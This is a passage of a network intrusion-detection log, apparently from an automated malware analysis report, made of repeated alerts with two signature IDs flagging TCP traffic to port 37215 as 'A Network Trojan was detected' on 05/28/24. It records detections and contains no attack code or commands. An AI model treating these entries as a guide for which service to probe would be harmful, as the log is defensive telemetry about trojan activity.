            SID:2829579
            Source Port:60960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730581
            SID:2835222
            Source Port:46206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.724756
            SID:2829579
            Source Port:51834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566000
            SID:2835222
            Source Port:36414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061227
            SID:2835222
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924140
            SID:2829579
            Source Port:42236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500112
            SID:2829579
            Source Port:43544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050840
            SID:2835222
            Source Port:52466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056857
            SID:2835222
            Source Port:47006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532596
            SID:2835222
            Source Port:60934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400288
            SID:2835222
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275473
            SID:2829579
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936375
            SID:2835222
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851073
            SID:2835222
            Source Port:40236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746019
            SID:2829579
            Source Port:57852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048018
            SID:2829579
            Source Port:35874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811653
            SID:2829579
            Source Port:50424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563348
            SID:2835222
            Source Port:49124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020251
            SID:2829579
            Source Port:37646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626640
            SID:2829579
            Source Port:52914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933875
            SID:2835222
            Source Port:39502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828070
            SID:2829579
            Source Port:57736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.410725
            SID:2835222
            Source Port:47482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789495
            SID:2835222
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505776
            SID:2835222
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187349
            SID:2835222
            Source Port:36854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710011
            SID:2835222
            Source Port:34132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231256
            SID:2835222
            Source Port:39144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870491
            SID:2835222
            Source Port:54834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996152
            SID:2829579
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.021327
            SID:2829579
            Source Port:43744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857026
            SID:2829579
            Source Port:51070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733836
            SID:2835222
            Source Port:44388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953448
            SID:2835222
            Source Port:54564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437166
            SID:2835222
            Source Port:45494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615015
            SID:2829579
            Source Port:53512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923471
            SID:2829579
            Source Port:50710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322494
            SID:2829579
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871706
            SID:2835222
            Source Port:39062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930456
            SID:2829579
            Source Port:41978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821430
            SID:2829579
            Source Port:53982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811487
            SID:2829579
            Source Port:56254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.903935
            SID:2835222
            Source Port:46548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850313
            SID:2829579
            Source Port:48900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953485
            SID:2829579
            Source Port:50478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646738
            SID:2835222
            Source Port:54288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753695
            SID:2829579
            Source Port:50050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837116
            SID:2829579
            Source Port:44330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926115
            SID:2835222
            Source Port:57030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879473
            SID:2829579
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998656
            SID:2835222
            Source Port:43310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033597
            SID:2835222
            Source Port:42120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856405
            SID:2829579
            Source Port:55456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276353
            SID:2829579
            Source Port:33958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862510
            SID:2835222
            Source Port:55696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817611
            SID:2829579
            Source Port:34698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919680
            SID:2835222
            Source Port:35300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640460
            SID:2829579
            Source Port:55790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601853
            SID:2835222
            Source Port:34392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051841
            SID:2835222
            Source Port:56946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924379
            SID:2829579
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729064
            SID:2829579
            Source Port:60874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861780
            SID:2835222
            Source Port:59728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764225
            SID:2835222
            Source Port:43798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733333
            SID:2835222
            Source Port:44322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818507
            SID:2829579
            Source Port:34032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837573
            SID:2829579
            Source Port:56906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020152
            SID:2835222
            Source Port:36228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685156
            SID:2829579
            Source Port:35976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276658
            SID:2835222
            Source Port:58890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507120
            SID:2835222
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878646
            SID:2835222
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712203
            SID:2829579
            Source Port:58426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076719
            SID:2835222
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.661822
            SID:2835222
            Source Port:42908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.131117
            SID:2835222
            Source Port:35232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864682
            SID:2829579
            Source Port:56950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320370
            SID:2829579
            Source Port:50858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891652
            SID:2829579
            Source Port:42718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488860
            SID:2829579
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280930
            SID:2829579
            Source Port:56346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290522
            SID:2829579
            Source Port:33932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919613
            SID:2829579
            Source Port:46828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066407
            SID:2835222
            Source Port:50642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2835222
            Source Port:56176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775747
            SID:2835222
            Source Port:43710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605284
            SID:2829579
            Source Port:48018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651801
            SID:2835222
            Source Port:46690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994079
            SID:2829579
            Source Port:42182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499747
            SID:2835222
            Source Port:46818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655690
            SID:2829579
            Source Port:55696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386461
            SID:2835222
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040249
            SID:2835222
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014696
            SID:2829579
            Source Port:48686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836953
            SID:2829579
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850213
            SID:2829579
            Source Port:51494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753826
            SID:2835222
            Source Port:37384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056826
            SID:2829579
            Source Port:47862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878686
            SID:2829579
            Source Port:38644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682073
            SID:2835222
            Source Port:55018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435770
            SID:2829579
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378110
            SID:2835222
            Source Port:56912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796090
            SID:2835222
            Source Port:51040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842957
            SID:2829579
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.854769
            SID:2835222
            Source Port:37734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252063
            SID:2829579
            Source Port:46128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565011
            SID:2829579
            Source Port:56514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850451
            SID:2835222
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612969
            SID:2835222
            Source Port:58192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052302
            SID:2835222
            Source Port:40398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809724
            SID:2835222
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.345037
            SID:2829579
            Source Port:60090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818086
            SID:2829579
            Source Port:38492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790554
            SID:2829579
            Source Port:36074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059631
            SID:2835222
            Source Port:43788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765990
            SID:2829579
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.649199
            SID:2829579
            Source Port:49498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809619
            SID:2835222
            Source Port:33396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837132
            SID:2829579
            Source Port:58360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048132
            SID:2829579
            Source Port:36350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910534
            SID:2829579
            Source Port:51862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956400
            SID:2829579
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071227
            SID:2835222
            Source Port:59998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807051
            SID:2835222
            Source Port:44684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069665
            SID:2835222
            Source Port:42702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158420
            SID:2835222
            Source Port:40432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039677
            SID:2835222
            Source Port:41700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728302
            SID:2829579
            Source Port:33656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.976831
            SID:2829579
            Source Port:53740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905089
            SID:2835222
            Source Port:52878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961089
            SID:2829579
            Source Port:34492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321249
            SID:2835222
            Source Port:33498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485622
            SID:2835222
            Source Port:38458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804665
            SID:2835222
            Source Port:36300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899734
            SID:2835222
            Source Port:39096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986201
            SID:2835222
            Source Port:33890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875528
            SID:2835222
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610150
            SID:2835222
            Source Port:59276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308715
            SID:2829579
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863197
            SID:2829579
            Source Port:55646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506727
            SID:2829579
            Source Port:48270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.305966
            SID:2829579
            Source Port:50082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280244
            SID:2835222
            Source Port:36296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831528
            SID:2835222
            Source Port:41230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937452
            SID:2835222
            Source Port:48956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810526
            SID:2835222
            Source Port:59056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824382
            SID:2829579
            Source Port:53002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925127
            SID:2835222
            Source Port:44326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756899
            SID:2835222
            Source Port:53366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931804
            SID:2835222
            Source Port:48430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575797
            SID:2829579
            Source Port:56382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061491
            SID:2829579
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994347
            SID:2835222
            Source Port:34472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038431
            SID:2835222
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.302178
            SID:2829579
            Source Port:36552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777385
            SID:2829579
            Source Port:36624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841056
            SID:2835222
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327164
            SID:2835222
            Source Port:35734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079385
            SID:2829579
            Source Port:56660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762167
            SID:2829579
            Source Port:58546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778355
            SID:2829579
            Source Port:44810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811918
            SID:2829579
            Source Port:59710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732722
            SID:2835222
            Source Port:59776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.879987
            SID:2829579
            Source Port:47092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746141
            SID:2835222
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568448
            SID:2835222
            Source Port:37922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655520
            SID:2835222
            Source Port:55802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778706
            SID:2835222
            Source Port:56106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956269
            SID:2829579
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842818
            SID:2835222
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923885
            SID:2835222
            Source Port:33200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833735
            SID:2829579
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860575
            SID:2835222
            Source Port:43650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811075
            SID:2835222
            Source Port:47498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039190
            SID:2829579
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818285
            SID:2835222
            Source Port:36106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918837
            SID:2829579
            Source Port:43766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772877
            SID:2835222
            Source Port:35378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914531
            SID:2835222
            Source Port:49750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510404
            SID:2829579
            Source Port:56286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872808
            SID:2835222
            Source Port:48174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920168
            SID:2835222
            Source Port:45444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901552
            SID:2835222
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596580
            SID:2829579
            Source Port:52172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147609
            SID:2835222
            Source Port:58436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968333
            SID:2835222
            Source Port:36874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917754
            SID:2835222
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805979
            SID:2829579
            Source Port:41032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.057104
            SID:2829579
            Source Port:38630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850257
            SID:2829579
            Source Port:60000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940279
            SID:2835222
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518641
            SID:2829579
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969931
            SID:2829579
            Source Port:34088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860446
            SID:2829579
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276953
            SID:2829579
            Source Port:42958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957244
            SID:2835222
            Source Port:46910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764305
            SID:2829579
            Source Port:51472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836642
            SID:2835222
            Source Port:45732
            Destination Port:37215
